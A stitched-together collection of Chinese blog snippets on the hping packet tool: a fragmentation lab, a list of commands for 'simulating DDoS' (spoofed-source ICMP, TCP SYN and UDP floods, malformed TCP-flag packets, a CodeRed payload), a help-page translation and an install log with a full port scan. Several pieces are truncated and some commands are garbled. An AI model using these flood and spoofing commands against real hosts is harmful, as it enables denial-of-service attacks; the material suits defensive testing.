1. 在Web主机上定位wireshark上定义过滤器用来抓包 2. 在PC上用ping命令发送在和大小为70000的ICMP包 [root@localhost ~]# ping 192.168.1.1 -s 70000 -c 1 Error: packet size 70000 is too large. Maximum is 65507   ##系统报错:允许发送的ICMP包的值最大为65507. 3. 用Hping命令，发送数据为7000的ICMP包 [root@localhost ~]# hping 192.168.1.1 -1 -d 70000 -c 1 HPING 192.168.1.1 (eth0 192.168.1.1): icmp mode set, 28 headers + 4464 data bytes len=1500 ip=192.168.1.1 ttl=127 DF id=57 icmp_seq=0 rtt=39.8 ms — 192.168.1.1 hping statistic — 1 packets tramitted, 1 packets received, 0% packet loss round-trip min/avg/max = 39.8/39.8/39.8 ms   ##可以看到，只截取了4464字节的数据 4. 在Web服务器上启用wireshark抓包 5. 在PC上编辑一个脚本，先发送两个小IP分片测试 [root@localhost ~]# vim pingcs.sh [root@localhost ~]# more pingcs.sh #!/bin/bash hping 192.168.1.1 -1 -x -d 800 -N 100 -c 1 hping 192.168.1.1 -1 -d 200 -g 808 -N 100 -c 1 [root@localhost ~]# chmod +x pingcs.sh [root@localhost ~]# ./pingcs.sh HPING 192.168.1.1 (eth0 192.168.1.1): icmp...

使用Hping模拟DDoS攻击,例举一些常用的方法： hping www.testtesttest.com -1 -i u100000 -a 192.168.100.200 每秒送10个(-i u10000)ICMP(-1)封包到www.testtesttest.com, 伪造来源IP地址(-a)为192.168.100.200  注：-1为数字非英文 hping www.testtesttest.com -i u1000000 -a 192.168.100.200 -s 22668 -p 33124  每秒送1个(-i u1000000)TCP(default)封包到www.testtesttest.com的port 33124，伪造来源IP地址(-a)192.168.100.200 使用的port为22668  测试1： SYN Flooding(每秒10个封包) hping destination_IP_address -i u100000 -s -a spoof_source_IP_address  测试2 ：伪造IP的ICMP封包(每秒10个封包) hping destination_IP_addressIP -i u100000 -1 -a spoof_source_IP_address  注：-1为数字非英文  测试3：不正常TCP Flag組合封包(每秒10个封包) (a)SYN+FIN hping destination_IP_address -i u100000 -s -F -a spoof_source_IP_address  (b)X’mas hping destination_IP_address -i u100000 -F -s -R -p -a -U -a spoof_source_IP_address  测试4：伪造IP的UDP封包 hpingdestination_IP_address -i u100000 -2 -a spoof_source_IP_address 测试5：伪造IP內含CodeRed封包 hping destination_IP_address -i u100000 -d [封包datasize] -E [filename] -a [spoof_source_IP_address]    PS：您可以拿它來测试您的系統防护能力，但是千万別拿來乱用   Hping的安装请参考文章安装Hping 

HPING 使用方法 一、HPING和ping的区别： 典型ping程序使用的是ICMP回显请求来测试网络是否通畅，而HPING可以使用任何IP报文，包括ICMP、TCP、UDP、RAWSOCKET。 二、下载： HTTP：//WWW.HPING.ORG/ 三、安装方法见在CentOS上安装hping。 四、命令注释： ~$ hping2 --help usage: hping host [options] -h --help show this help //*help -v --version show version //*版本 -c --count packet count //*hping的包数量 和ping相同。 -i --interval wait (uX for X microseconds, for example -i u1000) //*hping的间隔 u表示微妙，--fast表示快速模式，一秒10个包。 --fast alias for -i u10000 (10 packets for second) -n --numeric numeric output //*表示不进行名称解析。 -q --quiet quiet //*安静模式 只输出开始结束信息。 -I --interface interface name (otherwise default routing interface) //*使用网卡端口，缺省按路由表进行。 -V --verbose verbose mode //*详细模式 一般显示很多包信息。 -D --debug debugging info //*debug模式，定义hping2使用模式。 -z --bind bind ctrl+z to ttl (default to dst port)//*帮定快捷键 -Z --unbind unbind ctrl+z //*撤销快捷键。 Mode //*模式选择。 default mode TCP （缺省使用TCP进行PING处理） -0 --rawip RAW IP mode //*裸IP方式。使用RAWSOCKET方式。 -1 --icmp ICMP mode //*ICMP模式。 -2 --udp UDP mode //*UDP模式 -8 --scan SCAN mode. //*扫描模式...

最近工作中要用到hping，就安装了个。顺便在这儿记录一下自己的安装过程。 我用的操作系统是CentOS5.5 安装步骤： 下载hiping软件 #wget http://www.hping.org/hping3-20051105.tar.gz 解压下载的文件 #tar -xzf hping3-20051105.tar.gz #cd hping3-20051105 #./configure # make && make install   这个时候出现错误：pcap.h No such file or directory. 提示缺少头文件pcap.h，于是安装libpcap-devel来提供这个头文件： 使用yum安装libpcap-devel #yum install libpcap-devel 安装完libpcap-devel之后，再次运行#./configure和# make && make install 又出现一个错误：net/bpf.h no such file or directory 提示缺少头文件bpf.h，此时用ln将centos自带的头文件链接过来提供这个头文件： 运行以下命令： # ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h 接着再次运行 #./configure和# make && make install 再次出现一个错误：/usr/bin/ld: cannot find -ltcl 提示找不到-ltcl。 平时在这台机器上不需要用TCL，所以我将它去除： ./configure --no-tcl 至此，再运行 # make && make install 总算可以安装成功了。 hping使用时的常用命令： hping xx.xx.xx.xx --scan 1-65535 -d 100 -S -V 列出所有命令帮助： # hping --h usage: hping host [options] -h --help show this help -v --version show version -c --count packet count -i --interval wait (uX for X microseconds, for...